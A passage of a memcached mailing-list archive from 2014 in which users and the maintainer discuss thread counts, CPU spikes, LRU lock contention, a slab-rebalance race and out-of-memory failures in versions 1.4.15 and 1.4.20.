 write), standard TCP timeouts (which are much
 faster) apply.

 (And yes, we do have lots of idle connections to our caches, but that’s not 
 something we can immediately fix, nor should it
 directly be the cause of these issues.)

 Anyhow… thoughts?

 -j

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
Please upgrade. If you have problems with the latest version we can look
into it more.

You can also look at command counters for odd commands being given: make
sure nobody's running flushes, or stats sizes, or stats cachedump
since those can cause CPU spikes and hangs.

With 1.4.20 you can use stats conns to see what the connections are
doing during the cpu spike.

On Thu, 7 Aug 2014, Claudio Santana wrote:

 Forgot to say I'm running version 1.4.13  libevent 2.0.16-stable



 On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana claudio.sant...@gmail.com 
 wrote:
   Sorry for the late response.

 My CPU utilization normally is min 2.5% to 6.5% max.

 So it's interesting you ask this. The reason why I submitted the 1st question 
 is because I've experienced some random CPU
 utilization spikes. From this about 6% CPU utilization all of the sudden it 
 spikes to 100% and I can see the offending
 process is one of the Memcached instances. Sadly this CPU spike is 
 accompanied by all requests timing out causing the
 whole system to become unusable.

 I collect minute by minute stats of all these memcached instances and 
 according to my stats this issue happens within 2
 minutes. I can see in the number of commands there's no increase in number of 
 commands being issued right before the CPU
 spike nor increase in the number of bytes in/out.

 Does anybody have any ideas of what could be going on?

 I have all Memcached stats collected by minute in Graphite, I can provide 
 other stats that could help explain this issue
 if necessary.


 On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote:
   You could run one instance with one thread and serve all of that just
   fine. have you actually looked at graphs of the CPU usage of the host?
   memcached should be practically idle with load that low.

   One with -t 6 or -t 8 would do it just fine.

   On Mon, 4 Aug 2014, Claudio Santana wrote:

Dormando, thanks for the quick response. Sorry for the confusion, I 
 don't have exact metrics per second but
   per minute 1.12
million sets and 1.8 million gets which translates to 18,666 sets per 
 minute and 30,000 gets per second.
   
These stats are per Memcached instance which I currently run 3 on 
 each server.
   
Claudio.
   
   
On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote:
      On Mon, 4 Aug 2014, Claudio Santana wrote:
   
       I have this Memcached cluster where 3 instances of Memcached 
 run in a single server. These servers
   have 24 cores,
      each instance
       is configured to have 8 threads each. Each individual 
 instance serves  have about 5000G gets/sets a
   day and about
      3k current
       connections.
   
I don't know what 5000G gets/sets a day translates to in per-second 
 (nor
what the G-unit even is?), can you define this?
   
 What would be better? consolidate these 3 instances to a single 
 instance per server with 24 threads? I've
   read in a few
articles
 that Memcached's performance starts suffering with more than 4-6 
 threads per instance, is this generally
   true?

 How about keeping the 3 instances per server and decreasing the 
 number of threads to say 4 or 6? or
   creating 4 instances
in the
 same servers instead of 3 and decreasing the number of threads per 
 instance to 6 so there is one thread
   per core.

 Is there a guide you could recommend to configure the right number 
 of threads and strategies to get the
   most out of a
Memcached
 server/instance?

 Thanks,
 Claudio

 --

 ---
 You received this message because you are subscribed to the Google 
 Groups memcached group.
 To unsubscribe from this group and stop receiving emails from it, 
 send an email to
memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to
   memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to
   memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

   --

   ---
   You received this message because you are subscribed to the Google

Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
Those three stats commands aren't problematic. The others I listed are.
Sadly there aren't stats counters for them, I think... Are you sure it's
not completely crashing after the CPU spike? it actually recovers on its
own?

On Thu, 7 Aug 2014, Claudio Santana wrote:


 I run every minute stats, stats items and stats slabs.

 the only commands executed are remove, incr, add, get, set and cas.

 I'm running now with 6 threads per instance with 3 per server and haven't had 
 the issue again,  not that this change fixed it.

 I'll definitely update.

 On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote:
   Please upgrade. If you have problems with the latest version we can look
   into it more.

   You can also look at command counters for odd commands being given: make
   sure nobody's running flushes, or stats sizes, or stats cachedump
   since those can cause CPU spikes and hangs.

   With 1.4.20 you can use stats conns to see what the connections are
   doing during the cpu spike.

   On Thu, 7 Aug 2014, Claudio Santana wrote:

Forgot to say I'm running version 1.4.13  libevent 2.0.16-stable
   
   
   
On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana 
 claudio.sant...@gmail.com wrote:
      Sorry for the late response.
   
My CPU utilization normally is min 2.5% to 6.5% max.
   
So it's interesting you ask this. The reason why I submitted the 1st 
 question is because I've experienced some
   random CPU
utilization spikes. From this about 6% CPU utilization all of the 
 sudden it spikes to 100% and I can see the
   offending
process is one of the Memcached instances. Sadly this CPU spike is 
 accompanied by all requests timing out causing
   the
whole system to become unusable.
   
I collect minute by minute stats of all these memcached instances and 
 according to my stats this issue happens
   within 2
minutes. I can see in the number of commands there's no increase in 
 number of commands being issued right before
   the CPU
spike nor increase in the number of bytes in/out.
   
Does anybody have any ideas of what could be going on?
   
I have all Memcached stats collected by minute in Graphite, I can 
 provide other stats that could help explain this
   issue
if necessary.
   
   
On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote:
      You could run one instance with one thread and serve all of 
 that just
      fine. have you actually looked at graphs of the CPU usage of 
 the host?
      memcached should be practically idle with load that low.
   
      One with -t 6 or -t 8 would do it just fine.
   
      On Mon, 4 Aug 2014, Claudio Santana wrote:
   
       Dormando, thanks for the quick response. Sorry for the 
 confusion, I don't have exact metrics per second
   but
      per minute 1.12
       million sets and 1.8 million gets which translates to 18,666 
 sets per minute and 30,000 gets per second.
      
       These stats are per Memcached instance which I currently run 
 3 on each server.
      
       Claudio.
      
      
       On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net 
 wrote:
             On Mon, 4 Aug 2014, Claudio Santana wrote:
      
              I have this Memcached cluster where 3 instances of 
 Memcached run in a single server. These servers
      have 24 cores,
             each instance
              is configured to have 8 threads each. Each individual 
 instance serves  have about 5000G gets/sets
   a
      day and about
             3k current
              connections.
      
       I don't know what 5000G gets/sets a day translates to in 
 per-second (nor
       what the G-unit even is?), can you define this?
      
        What would be better? consolidate these 3 instances to a 
 single instance per server with 24 threads?
   I've
      read in a few
       articles
        that Memcached's performance starts suffering with more 
 than 4-6 threads per instance, is this generally
      true?
       
        How about keeping the 3 instances per server and decreasing 
 the number of threads to say 4 or 6? or
      creating 4 instances
       in the
        same servers instead of 3 and decreasing the number of 
 threads per instance to 6 so there is one thread
      per core.
       
        Is there a guide you could recommend to configure the right 
 number of threads and strategies to get the
      most out of a
       Memcached
        server

Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
No command can take up much time. If all other commands hang up, it's
either a long-running stats command like I listed before, or a hang bug
(though I don't know why it would recover on its own). We've fixed a lot
of those since .13, so I'd still advocate upgrading at least some
instances to see if they become immune to it.

On Thu, 7 Aug 2014, Claudio Santana wrote:


 I think this issue has something to do with our access pattern (although we 
 run very limited commands and not very high traffic
 either).

 We always start having issues on the same instance (I guess because of the 
 system accessing a specific key). When we notice the
 issue we bounce the instance within 15/20 mins, I don't know if you think 
 this is not enough time to recover.

 Sometimes the issue moves to other instaces in other servers (our client 
 doesn't rebalance so the system is trying to access
 completely different keys). On the other servers sometimes the issue goes 
 away on its own or the spike is not at 100pct.

 On Aug 7, 2014 6:36 PM, dormando dorma...@rydia.net wrote:
   Those three stats commands aren't problematic. The others I listed are.
   Sadly there aren't stats counters for them, I think... Are you sure it's
   not completely crashing after the CPU spike? it actually recovers on its
   own?

   On Thu, 7 Aug 2014, Claudio Santana wrote:

   
I run every minute stats, stats items and stats slabs.
   
the only commands executed are remove, incr, add, get, set and cas.
   
I'm running now with 6 threads per instance with 3 per server and 
 haven't had the issue again,  not that this
   change fixed it.
   
I'll definitely update.
   
On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote:
      Please upgrade. If you have problems with the latest version we 
 can look
      into it more.
   
      You can also look at command counters for odd commands being 
 given: make
      sure nobody's running flushes, or stats sizes, or stats 
 cachedump
      since those can cause CPU spikes and hangs.
   
      With 1.4.20 you can use stats conns to see what the 
 connections are
      doing during the cpu spike.
   
      On Thu, 7 Aug 2014, Claudio Santana wrote:
   
       Forgot to say I'm running version 1.4.13  libevent 
 2.0.16-stable
      
      
      
       On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana 
 claudio.sant...@gmail.com wrote:
             Sorry for the late response.
      
       My CPU utilization normally is min 2.5% to 6.5% max.
      
       So it's interesting you ask this. The reason why I submitted 
 the 1st question is because I've experienced
   some
      random CPU
       utilization spikes. From this about 6% CPU utilization all of 
 the sudden it spikes to 100% and I can see
   the
      offending
       process is one of the Memcached instances. Sadly this CPU 
 spike is accompanied by all requests timing out
   causing
      the
       whole system to become unusable.
      
       I collect minute by minute stats of all these memcached 
 instances and according to my stats this issue
   happens
      within 2
       minutes. I can see in the number of commands there's no 
 increase in number of commands being issued right
   before
      the CPU
       spike nor increase in the number of bytes in/out.
      
       Does anybody have any ideas of what could be going on?
      
       I have all Memcached stats collected by minute in Graphite, I 
 can provide other stats that could help
   explain this
      issue
       if necessary.
      
      
       On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net 
 wrote:
             You could run one instance with one thread and serve 
 all of that just
             fine. have you actually looked at graphs of the CPU 
 usage of the host?
             memcached should be practically idle with load that low.
      
             One with -t 6 or -t 8 would do it just fine.
      
             On Mon, 4 Aug 2014, Claudio Santana wrote:
      
              Dormando, thanks for the quick response. Sorry for 
 the confusion, I don't have exact metrics per
   second
      but
             per minute 1.12
              million sets and 1.8 million gets which translates to 
 18,666 sets per minute and 30,000 gets per
   second.
             
              These stats are per Memcached instance which I 
 currently run 3 on each server.
             
              Claudio

Re: Export Control Classification Number (ECCN) of memcached 1.4

2014-08-06 Thread dormando
I have no idea what you're talking about.

On Wed, 6 Aug 2014, skt8u...@gmail.com wrote:

 Dear All,

 I'm developing a system using memcached 1.4
 and I'll release it to the other country (Italy).

 Could you please give me, the US Export Control Classification Number (ECCN) 
 of memcached 1.4 ?

 I understand that there is no ECCN for Open Source software basically.

 Could you please confirm that ?

 Thanks for your answer.

 Best regards,
 Tommy

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached instance and thread configuration parameters

2014-08-04 Thread dormando
On Mon, 4 Aug 2014, Claudio Santana wrote:

 I have this Memcached cluster where 3 instances of Memcached run in a single 
 server. These servers have 24 cores, each instance
 is configured to have 8 threads each. Each individual instance serves  have 
 about 5000G gets/sets a day and about 3k current
 connections.

I don't know what 5000G gets/sets a day translates to in per-second (nor
what the G-unit even is?), can you define this?

 What would be better? consolidate these 3 instances to a single instance per 
 server with 24 threads? I've read in a few articles
 that Memcached's performance starts suffering with more than 4-6 threads per 
 instance, is this generally true?

 How about keeping the 3 instances per server and decreasing the number of 
 threads to say 4 or 6? or creating 4 instances in the
 same servers instead of 3 and decreasing the number of threads per instance 
 to 6 so there is one thread per core.

 Is there a guide you could recommend to configure the right number of threads 
 and strategies to get the most out of a Memcached
 server/instance?

 Thanks,
 Claudio

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached instance and thread configuration parameters

2014-08-04 Thread dormando
You could run one instance with one thread and serve all of that just
fine. have you actually looked at graphs of the CPU usage of the host?
memcached should be practically idle with load that low.

One with -t 6 or -t 8 would do it just fine.

On Mon, 4 Aug 2014, Claudio Santana wrote:

 Dormando, thanks for the quick response. Sorry for the confusion, I don't 
 have exact metrics per second but per minute 1.12
 million sets and 1.8 million gets which translates to 18,666 sets per minute 
 and 30,000 gets per second.

 These stats are per Memcached instance which I currently run 3 on each server.

 Claudio.


 On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote:
   On Mon, 4 Aug 2014, Claudio Santana wrote:

I have this Memcached cluster where 3 instances of Memcached run in a 
 single server. These servers have 24 cores,
   each instance
is configured to have 8 threads each. Each individual instance serves 
  have about 5000G gets/sets a day and about
   3k current
connections.

 I don't know what 5000G gets/sets a day translates to in per-second (nor
 what the G-unit even is?), can you define this?

  What would be better? consolidate these 3 instances to a single instance 
  per server with 24 threads? I've read in a few
 articles
  that Memcached's performance starts suffering with more than 4-6 threads 
  per instance, is this generally true?
 
  How about keeping the 3 instances per server and decreasing the number of 
  threads to say 4 or 6? or creating 4 instances
 in the
  same servers instead of 3 and decreasing the number of threads per instance 
  to 6 so there is one thread per core.
 
  Is there a guide you could recommend to configure the right number of 
  threads and strategies to get the most out of a
 Memcached
  server/instance?
 
  Thanks,
  Claudio
 
  --
 
  ---
  You received this message because you are subscribed to the Google Groups 
  memcached group.
  To unsubscribe from this group and stop receiving emails from it, send an 
  email to
 memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: LRU lock per slab class

2014-08-03 Thread dormando
 Hello Dormando,
 Thanks for the answer.

 The LRU fiddling only happens once a minute per item, so hot items don't 
 affect the lock as much. The more you lean toward hot
 items the better it scales as-is.
 = For linked-list traversal, pthreads acquire item-partitioned lock. But 
 threads acquire global lock for LRU update. 
 So, all the GET commands that found requested item on the hash table tries to 
 acquire the same lock, so, I think the total hit
 rate is more affecting factor to the lock contention 
 than how often each item is touched for LRU update. I missed something??

The GET command only acquires the LRU lock if it's been more than a minute
since the last time it was retrieved. That's all there is to it.

 I don't think anything stops it. Rebalance tends to stay within one class. It 
 was on my list of scalability fixes to work on,
 but I postponed it for a few reasons.
 One is that most tend to have over half of their requests in one slab class. 
 So splitting the lock doesn't give as much of a
 long term benefit.
 So, I wanted to come back to it later and see what other options were 
 plausible for scaling the lru within a single slab class.
 Nobody's complained about the performance after the last round of work as 
 well, so it stays low priority.
 Are your objects always only hit once per minute? What kind of performance 
 are you seeing and what do you need to get out of it?
 = Thanks for your comments. I was trying to find some proper network 
 speed(1Gb,10Gb) for current memcached operation. 
 I saw the best performance around 4~6 threads (1.1M rps) with the help of 
 multi-get. 

With the LRU out of the way it does go up to 12-16 threads. Also if you
use numactl to pin it to one node it seems to do better... but most people
just don't hit it that hard, so it doesn't matter?


 2014년 8월 2일 토요일 오전 8시 19분 59초 UTC+9, Dormando 님의 말:


 On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungch...@gmail.com wrote:

   Hello,
 I'm testing the scalability of memcached-1.4.20 version in a GET dominated 
 system.
 For a linked-list traversal in a hash table (do_item_get), it is protected by 
 interleaved lock (per bucket),
 so it showed very high scalability. 
 But, after linked-list traversal, LRU update is protected by a global lock 
 (cache_lock),
 so the scalability was limited around 4~6 threads by global lock of the LRU 
 update global in a Xeon server system
 (10Gb ethernet).


 The LRU fiddling only happens once a minute per item, so hot items don't 
 affect the lock as much. The more you lean toward
 hot items the better it scales as-is. 



 As i know, LRU is maintained per slab class, so LRU update modifies only the 
 items contained in the same class.
 So, i think the global lock of LRU update may be changed to interleaved lock 
 per slab class.
 By SET command at the same time, store and removal of items in the same class 
 can happen concurrently, 
 but SET operation also can be changed to get the slab class lock before 
 adding/removing some new items to/from the
 slab class. 

 In case of store/removal of the linked item in the hash table (which may 
 reside on the different slab class), 
 it only updates the h_next value of current item, and it does not touch LRU 
 pointers (next, prev). 
 So, i think it would be safe to change to interleaved lock.

 Are there any other reasons that LRU update requires a global lock that I 
 missed ??
 (I'm not using slab rebalance and giving an initial hash power value large 
 enough, and clients only use GET, SET
 commands)


 I don't think anything stops it. Rebalance tends to stay within one class. It 
 was on my list of scalability fixes to work
 on, but I postponed it for a few reasons.

 One is that most tend to have over half of their requests in one slab class. 
 So splitting the lock doesn't give as much of
 a long term benefit.

 So, I wanted to come back to it later and see what other options were 
 plausible for scaling the lru within a single slab
 class. Nobody's complained about the performance after the last round of work 
 as well, so it stays low priority.

 Are your objects always only hit once per minute? What kind of performance 
 are you seeing and what do you need to get out
 of it?

 It would be highly appreciated for any comments!!

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from

Re: LRU lock per slab class

2014-08-01 Thread Dormando


 On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungchul.h...@gmail.com 
 wrote:
 
 Hello,
 
 I'm testing the scalability of memcached-1.4.20 version in a GET dominated 
 system.
 For a linked-list traversal in a hash table (do_item_get), it is protected by 
 interleaved lock (per bucket),
 so it showed very high scalability. 
 But, after linked-list traversal, LRU update is protected by a global lock 
 (cache_lock),
 so the scalability was limited around 4~6 threads by global lock of the LRU 
 update global in a Xeon server system (10Gb ethernet).

The LRU fiddling only happens once a minute per item, so hot items don't affect 
the lock as much. The more you lean toward hot items the better it scales as-is.

 
 As i know, LRU is maintained per slab class, so LRU update modifies only the 
 items contained in the same class.
 So, i think the global lock of LRU update may be changed to interleaved lock 
 per slab class.
 By SET command at the same time, store and removal of items in the same class 
 can happen concurrently, 
 but SET operation also can be changed to get the slab class lock before 
 adding/removing some new items to/from the slab class. 
 
 In case of store/removal of the linked item in the hash table (which may 
 reside on the different slab class), 
 it only updates the h_next value of current item, and it does not touch LRU 
 pointers (next, prev). 
 So, i think it would be safe to change to interleaved lock.
 
 Are there any other reasons that LRU update requires a global lock that I 
 missed ??
 (I'm not using slab rebalance and giving an initial hash power value large 
 enough, and clients only use GET, SET commands)

I don't think anything stops it. Rebalance tends to stay within one class. It 
was on my list of scalability fixes to work on, but I postponed it for a few 
reasons.

One is that most tend to have over half of their requests in one slab class. So 
splitting the lock doesn't give as much of a long term benefit.

So, I wanted to come back to it later and see what other options were plausible 
for scaling the lru within a single slab class. Nobody's complained about the 
performance after the last round of work as well, so it stays low priority.

Are your objects always only hit once per minute? What kind of performance are 
you seeing and what do you need to get out of it?
 
 It would be highly appreciated for any comments!!
 
 -- 
 
 --- 
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-07-07 Thread dormando


 Dormando,Sure, I waited till Monday (our usual tailrepair/oom errors day) but 
 we did not have any issues today :). I will continue to monitor and
 will grab stats conns next time.

Great, thanks!

 As for network issues during the last time - i do not see any but still 
 trying to find. This can be good explanation why we have such events
 grouped in time.

 As for keepalive - we use default php-memcached/libmemcached setting (do not 
 change it) and as I see libmemcached does not set SO_KEEPALIVE. Do you
 recommend to set it?

Lets see what stats conns says first. I guess it's theoretically possible
that an item was leaked, but was actually fetched (and expired properly)
at some point, fixing the issue. Would've still leaked the item though.

So if 'stats conns' doesn't show some hung clients we might still have a
reference leak somewhere. Which would be sad since Steven Grimm fixed a
number of them just recently..

 On Wednesday, July 2, 2014 7:32:14 PM UTC-7, Dormando wrote:
   Thanks!

   This is a little exciting actually, it's a new bug!

   tailrepairs was only necessary when an item was legitimately leaked; if 
 we
   don't reap it, it never gets better. However you stated that for three
   hours all sets fail (and at the same time some .15's crashed). Then it
   self-recovered.

   The .15 crashes were likely from the bug I fixed; where an active item 
 is
   fetched from the tail, but then reclaimed because it's old.

   The .20 OOM is the defensive code working perfectly; something has
   somehow retained a legitimate reference to an item for multiple hours!
   More than one even, since the tail is walked up by several items while
   looking for something to free.

   Did you have any network blips, application server crashes, or the like?
   It sounds like some connections are dying in such a way that they time
   out, which is a very long timeout somehow (no tcp keepalives?).

   What's *extra* exciting is that 1.4.20 now has the stats conns 
 command.

   If this happens again, while a .20 machine is actively OOM'ing, can you
   grab a couple copies of the stats conns output, a few minutes apart?
   That should definitively tell us if there are stuck connections causing
   this issue.

   Someone had a PR open for adding idle connection timeouts, but I asked
   them to redo it on top of the 'stats conns' work as a more efficient
   background thread. I could potentially finish this and it would be 
 usable
   as a workaround. You could also enable tcp keepalives, or otherwise fix
   whatever's causing these events.

   I wonder if it's also worth attempting to relink an item that ends up in
   the tail but has references? That would at least potentially get them 
 out
   of the way of memory reclamation.

   Thanks!

   On Wed, 2 Jul 2014, Denis Samoylov wrote:

1)  OOM's on slab 13, but it recovered on its own? This is under 
 version 1.4.20 and you did *not* enable tail repairs? correct
   
2) Can you share (with me at least) the full stats/stats items/stats 
 slabs output from one of the affected servers running 1.4.20? 
sent you _current_ stats from the server that had OOM couple days ago 
 and still running (now with no issues).
   
3) Can you confirm that 1.4.20 isn't *crashing*, but is actually 
 exhibiting write failures? 
correct
   
we will enable saving stderr to log. may be this can show something. 
 If you have any other ideas - let me know.
   
-denis
   
   
   
On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote:
      Cool. That is disappointing.
   
      Can you clarify a few things for me:
   
      1) You're saying that you were getting OOM's on slab 13, but it 
 recovered
      on its own? This is under version 1.4.20 and you did *not* 
 enable tail
      repairs?
   
      2) Can you share (with me at least) the full stats/stats 
 items/stats slabs
      output from one of the affected servers running 1.4.20?
   
      3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
      exhibiting write failures?
   
      If it's not a crash, and your hash power level isn't expanding, 
 I don't
      think it's related to the other bug.
   
      thanks!
   
      On Wed, 2 Jul 2014, Denis Samoylov wrote:
   
       Dormando, sure, we will add option to preset hashtable. (as i 
 see nn should be 26).
       One question: as i see in logs for the servers there is no 
 change for hash_power_level before incident (it would be hard to
   say for
      crushed but .20
       just had outofmemory and i have solid stats). Does not this 
 contradict the idea of cause? Server had

Re: slab re-balance seems not thread-safty

2014-07-03 Thread dormando
Seems like you're right.. I'd re-arranged where the LRU lock (cache_lock)
is called then forgot to update that one bit. Most of the do_item_unlink
code is safe there, until it gets into the LRU bits. It's unlikely anyone
actually saw a crash from this as it's a narrow race though.

That's easy to fix. It's still necessary to delete it, since threads can
stack around a handful of objects and cause rebalance to hang.

Thanks!

On Thu, 3 Jul 2014, Zhiwei Chan wrote:

  the item lock can only protect the hash list, but what about the LRU list? 
 As far as i know, if trying to delete a node from a doubly-linked-list,
 it is necessary to lock at least 3 node: node, node-pre, node-next. I will 
 try to check if it may crash the LRU list in gdb next week .
   And I think in do_item_get it is not necessary to delete the item that is 
 re-balanced, just leave it there and return NULL seems better.

 在 2014年7月3日星期四UTC+8下午1时30分29秒,Dormando写道:
   the item lock is already held for that key when do_item_get is called,
   which is why the nolock code is called there.

   slab rebalance has that second short-circuiting of fetches to ensure 
 very
   hot items don't permanently jam a page move.

   On Wed, 2 Jul 2014, Zhiwei Chan wrote:

Hi all,   I have thought carefully about the the thread-safe 
 memcached recently, and found that if the re-balance is running, it may
   not
thread-safety. The code do_item_get-do_item_unlink_nolock may 
 corrupt the hash table. Whenever it trying to modify the hash table,
   it should get
cache_lock, but the function do_item_get have not got the cache_lock.
   Please tell me if anything i neglected.
   
/** wrapper around assoc_find which does the lazy expiration logic */
item *do_item_get(const char *key, const size_t nkey, const uint32_t 
 hv) {
    //mutex_lock(cache_lock);
    item *it = assoc_find(key, nkey, hv);
    if (it != NULL) {
        refcount_incr(it-refcount);
        /* Optimization for slab reassignment. prevents popular items 
 from
         * jamming in busy wait. Can only do this here to satisfy 
 lock order
         * of item_lock, cache_lock, slabs_lock. */
        if (slab_rebalance_signal 
            ((void *)it = slab_rebal.slab_start  (void *)it  
 slab_rebal.slab_end)) {
            do_item_unlink_nolock(it, hv);   
 --- no lock 
 before
   unlink.
            do_item_remove(it);
            it = NULL;
        }
    }
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-07-02 Thread dormando
Cool. That is disappointing.

Can you clarify a few things for me:

1) You're saying that you were getting OOM's on slab 13, but it recovered
on its own? This is under version 1.4.20 and you did *not* enable tail
repairs?

2) Can you share (with me at least) the full stats/stats items/stats slabs
output from one of the affected servers running 1.4.20?

3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
exhibiting write failures?

If it's not a crash, and your hash power level isn't expanding, I don't
think it's related to the other bug.

thanks!

On Wed, 2 Jul 2014, Denis Samoylov wrote:

 Dormando, sure, we will add option to preset hashtable. (as i see nn should 
 be 26).
 One question: as i see in logs for the servers there is no change for 
 hash_power_level before incident (it would be hard to say for crushed but .20
 just had outofmemory and i have solid stats). Does not this contradict the 
 idea of cause? Server had hash_power_level = 26 for days before and
 still has 26 days after. Just for three hours every set for slab 13 failed. 
 We did not reboot/flush server and it continues to work without
 problem. What do you think?

 On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote:
   Hey,

   Can you presize the hash table? (-o hashpower=nn) to be large enough on
   those servers such that hash expansion won't happen at runtime? You can
   see what hashpower is on a long running server via stats to know what to
   set the value to.

   If that helps, we might still have a bug in hash expansion. I see 
 someone
   finally reproduced a possible issue there under .20. .17/.19 fix other
   causes of the problem pretty thoroughly though.

   On Tue, 1 Jul 2014, Denis Samoylov wrote:

Hi,
We had sporadic memory corruption due tail repair in pre .20 version. 
 So we updated some our servers to .20. This Monday we observed
   several
crushes in .15 version and tons of allocation failure in .20 
 version. This is expected as .20 just disables tail repair but it
   seems the
problem is still there. What is interesting:
1) there is no visible change in traffic and only one slab is 
 affected usually. 
2) this always happens with several but not all servers :)
   
Is there any way to catch this and help with debug? I have all slab 
 and item stats for the time around incident for .15 and .20
   version. .15 is
clearly memory corruption: gdb shows that hash function returned 0 
 (line 115 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);).
   
so we seems hitting this comment:
            /* Old rare bug could cause a refcount leak. We haven't 
 seen
             * it in years, but we leave this code in to prevent 
 failures
             * just in case */
   
:)
   
Thank you,
Denis
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-07-02 Thread dormando
Thanks!

This is a little exciting actually, it's a new bug!

tailrepairs was only necessary when an item was legitimately leaked; if we
don't reap it, it never gets better. However you stated that for three
hours all sets fail (and at the same time some .15's crashed). Then it
self-recovered.

The .15 crashes were likely from the bug I fixed; where an active item is
fetched from the tail, but then reclaimed because it's old.

The .20 OOM is the defensive code working perfectly; something has
somehow retained a legitimate reference to an item for multiple hours!
More than one even, since the tail is walked up by several items while
looking for something to free.

Did you have any network blips, application server crashes, or the like?
It sounds like some connections are dying in such a way that they time
out, which is a very long timeout somehow (no tcp keepalives?).

